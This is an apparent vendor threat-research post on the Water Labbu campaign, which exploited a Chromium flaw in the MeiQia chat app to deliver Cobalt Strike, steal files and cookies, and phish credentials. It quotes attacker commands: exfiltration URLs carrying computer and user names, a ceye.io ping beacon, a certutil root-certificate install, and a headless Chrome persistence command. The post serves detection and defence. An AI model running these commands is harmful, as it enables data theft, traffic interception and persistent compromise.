In the first part of our Water Labbu blog series, we described how the threat actor used the fraudulent websites of other cryptocurrency scammers to steal cryptocurrency. In our second entry in the Water Labbu series, we would like share how the threat actor leveraged a customer support application to compromise scammers and patched the application using malicious code.
During our investigation, we managed to find a staged Cobalt Strike loader on Virus Total (SHA-256: b81edcbf1a0b56d0f401dcfe4a6ae4d293663b42f120e60579353b6aa86bb105) associated with this threat campaign. According to the sandbox behavior report on Virus Total, the loader launched a Cobalt Strike instance that was instructed to report on the infection progress. The collected information was sent to the server, “linkstometa[.]com,” which, as mentioned in our first blog entry, was for collecting balance information and delivering cryptocurrency hijacking scripts.
Initial investigation
We discovered that the Cobalt Strike instance added a persistence registry key to load an exploit file from an online code repository controlled by Water Labbu. The repository hosted multiple exploit files of CVE-2021-21220 (a Chromium vulnerability affecting versions before 89.0.4389.128) to execute a Cobalt Strike stager. It also contained files designed to target Meiqia (美洽), a Chinese desktop-based live chat app for online customer support that is used on websites. MeiQia (美洽) was developed using ElectronJS — a framework that employs Chromium core, and therefore is vulnerable to Chromium’s vulnerabilities.
We observed that many cryptocurrency scam websites that were compromised in this campaign also embedded Meiqia to provide an option for easy communication with potential victims. This association suggests that Water Labbu likely sends the exploit via the live chat box. To support this claim, we found an exploit HTML file sample containing a screenshot that looks like a withdrawal confirmation for cryptocurrency funds. If scammers open the exploit page in an old vulnerable version of the Meiqia management client application, it’s possible that they might get infected by Water Labbu.
Infection chain
The infection is initiated when) the initial scammer (in essence, the victim) opens a weaponized webpage (likely sent to them via livechat). A recent research paper on Electron security demonstrated a successful exploitation of an Electron-based application using CVE-2021-21220. In this scenario, it leveraged cross-site scripting (XSS) techniques to force the exploit to be rendered in a window without sandboxing.
We found weaponized HTML pages created by Water Labbu that leverages the same Chromium vulnerability to attack the MeiQia application. The initial scammers used an old version of MeiQia, which might be vulnerable to exploits. Review of the code shows that old versions of MeiQia open external links inside their ElectronJS applications and render the web page without sandboxing. The latest version of MeiQia is not vulnerable because it runs on the newer version of Chromium core and also opens the external links, not inside the ElectronJS app, but via the default system web browser.
The weaponized HTML pages contain JavaScript that uses the User-Agent to identify whether the environment of the victim is vulnerable. The script detects strings such as “electron” and “x64” to discover Electron-based applications and x64 architecture. It also detects the strings “0.0.8 Chrome/83,” “s/0.0.7,” or “s/0.0.6,” to identify if it is running inside a vulnerable version of Chromium or MeiQia application. If the User-Agent does not match, it will either redirect victims to the official MeiQia website or create a new iframe to load screenshots from banking or cryptocurrency transactions. It’s likely that these are the lures Water Labbu used to communicate with the targeted cryptocurrency scam websites.
When the weaponized HTML pages detect a vulnerable target, it will proceed with loading additional stages of the attack.
The last stage involves the creation and loading of a new script called “tongji.js,” which in Chinese means 痛擊 (to deliver a punishing attack). These files are hosted inside Water Labbu’s code repository. The “tongji.js” script is a JavaScript containing CVE-2021-21220 exploit code, with a shellcode that is a Cobalt Strike stager. The Metasploit module for this vulnerability is publicly available. Water Labbu reuses the available code, obfuscates it with one or more layers of obfuscation (sojson.v4, jsjiami.com.v5), before executing the custom shellcode.
The embedded shellcode can either be a Cobalt Strike stager or a complex batch command capable of stealing credentials, and downloading and running other scripts and files.
Regardless if the embedded shellcode is the stager or the custom batch script, we noticed that the set of malicious operations that were being performed were largely the same:
1) Download and install Cobalt Strike
2) Steal cookies and other important files
3) Download and patch the MeiQia app
4) Download additional spying software
5) Provide information about the infection progress by communicating with the report-collecting server, among others
The Cobalt Strike stager
The Cobalt Stike stager is usually encrypted (XOR, AES), encoded (Base64, hexadecimal), and embedded into a Golang shellcode runner to make payload detection more difficult. The malware operator was likely inspired by this blog post.
The batch script used for file theft
It attempts to steal *.txt files in “\desktop\,” “\Telegram Desktop\,” and MeiQia cookies in “\AppData\Roaming\com.meiqia.windows\cookies.” These files are included in a specially crafted .html file and submitted to the information-collecting server with the help of headless Chrome (without visible UI) or Internet Explorer (if submission with Chrome fails). The specially crafted .html file contains one form, one input text with the computer name, and one text area with stolen content. After the timeout expires, the script will automatically submit the content to a typosquatting domain.
The batch script for downloading and installing Cobalt Strike
If Cobalt Strike has not been installed yet, then it is downloaded and executed. The Golang shellcode runner is used as a form of obfuscation.
The batch scripts for collecting reports about installation progress
To learn more about the success or failure of the infection progress, parameters such as COMPUTERNAME and USERNAME are exfiltrated to the report-collecting server. In case of failure, the server may call the following requests:
- https://<report collecting server>/?a=%COMPUTERNAME%&f=0&user=%USERNAME%
- https://<report collecting server>/?b=%COMPUTERNAME%&f=0&user=%USERNAME%
- https://<report collecting server>/?z=%COMPUTERNAME%user=%USERNAME%_fail
If the MeiQia app is not found, the error report with parameter “a” is sent. If the app is found and is unpatched, the error report with parameter “b” is sent. If the discretionary access control list modifications with icacls fails, the error report with parameter “z” is sent.
Meanwhile, another script checks if the process “360tray” belonging to the 360 Total Security solution is running:
- https://<report collecting server>/c/?c=%computername%
- https://<report collecting server>/c/?c=%computername%_no360
In some cases, we also noticed DNS and HTTP monitoring platforms such as ceye.io being used to collect information about the infection progress:
- ping %computername%.<unique identifier>.ceye.io
- The batch script for downloading and install MeiQia and Chrome
If necessary, this batch script will download a vulnerable version of Chrome (89.0.4389.114) and/or an-already patched MeiQia application from a repository found on a popular version control site. These files are downloaded and extracted to the infected system.
The script modifies the Run registry key for persistence, with the persistent command being “chrome.exe --headless --no-sandbox --user-data-dir=<path to user data dir> <path to CVE-2021-21220 exploit>”. Since the script installed a vulnerable version of Chrome, the next reboot of the operating system causes the exploitation of the vulnerability and execution of the embedded shellcode (either Cobalt Strike or a custom one).
The batch script for installing a malicious certificate and for modifying a proxy AutoConfig URL
This script adds a certificate to Trusted Root by via the certutil utility:
- certutil -addstore -f root "%userprofile%\<path to certificate>.pem
The script installs a certificate with the filename "mitmproxy-ca-cert.pem" into Trusted Root. Although we don’t have the certificate file, It's likely that it is generated by mitmproxy tool due to its file name.
It then modifies the AutoConfigURL setting in “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings”. These settings allow a user to specify certain domains to have their traffic forwarded through a proxy. With the help of a malicious certificate installed in the root directory, an attacker will be able to decrypt HTTPS encrypted traffic and steal entered credentials.
The batch script downloads and runs additional scripts (.ps1)
The additional scripts perform the following:
a) Hiding windows with the title “windows update.”
b) Downloading and running osmonitor, a tool for spying on victims and monitoring their behavior.
c) Patching the MeiQia app, either by downloading an already-patched app0.2.asar archive and replacing it, or by running a patcher script
d) Restarting the MeiQia app to start the patched version
e) Stealing *.txt and *.xl* files from “Recent Files,” steals *.lnk, *.txt, *.xl* files from “Desktop,” and adds a list of processes and list of active network connections before packing these into a zip archive and uploading it to an OS information-collecting server
The patched MeiQia app
The process of patching MeiQia involves changing files in the app.asar archive. In our scenario, the “.\modules\create-window.js” file from the app.asar archive was modified. The modifications included:
a) Disabling auto updates
b) Setting fixed window sizes
c) Replacing the default URL (https://app.meiqia.com) with a malicious one
d) Embedding additional JavaScript files to be executed within the MeiQia application context
When victims open a new MeiQia window, the script injected to the internal function “new-window” will check the title of the web page. If the title doesn’t contain the string “美洽” (MeiQia), it will redirect victims to the official MeiQia website and execute additional JavaScript files within the page.
During our research, we discovered that many of the links used for loading additional scripts were no longer active. However, one of the links loading a script called “apo.js” (阿婆 = mother-in-law) from their code repository was still available.
If the title contains the Chinese string “登录” (dēng lù = login), the script will try to grab the value of DOM elements with the IDs “email” and “password” and send the grabbed data to the remote server “app[.]meiqiacontents[.]com”. If the title contains the Chinese word “美” (Mei), it will collect the website’s cookies and send them to the same remote server.
When victims open a new window without specifying any URL to load, the new window will load the default URL of the application (APP_URL), which has also been replaced with a malicious URL hosted on the delivery server “mmmm[.]whg7[.]cc”. The delivery server will only respond when the User-Agent contains the string “Electron” to ensure that it is sent from an Electron application.
The request to the malicious URL responds with a code that redirects to the MeiQia app’s original default URL. At the same time, it creates a small new window to load another URL that will perform several redirections before finally attempting to exploit CVE-2021-21220 to launch a Cobalt Strike stager.
Credential phishing techniques
Water Labbu registered the typosquatting domain name meiqla.com (compared to the legitimate meiqia.com). Although the website looks visually identical to the legitimate one, there is one noteworthy malicious feature.
Figure 14 shows how the function lc() reads the user-entered email and password and exfiltrates them to an information-recording PHP script before redirecting victims to the legitimate meiqia.com website.
Conclusion
Water Labbu is a dangerous new threat actor with a complex routine and infrastructure that isn’t afraid to leverage the schemes of other scammers for its own ends, exploiting live chat applications on preexisting scam websites that were developed using the ElectronJS framework.
A key part of the threat actor’s routine is the exploitation of a known Chromium vulnerability to target scammers who use an unpatched version of the MeiQia app. Given that users are dealing not only with the original scammer, but with Water Labbu as well, we advise both individuals and organizations to update their applications and systems to the latest secure versions to prevent vulnerable software from being exploited and used in malicious ways.
Read the first part of our Water Labbu series to learn more about how the threat actor compromises Dapps for their own purposes.
Indicators of Compromise
The indicators of compromise for this blog entry can be found here.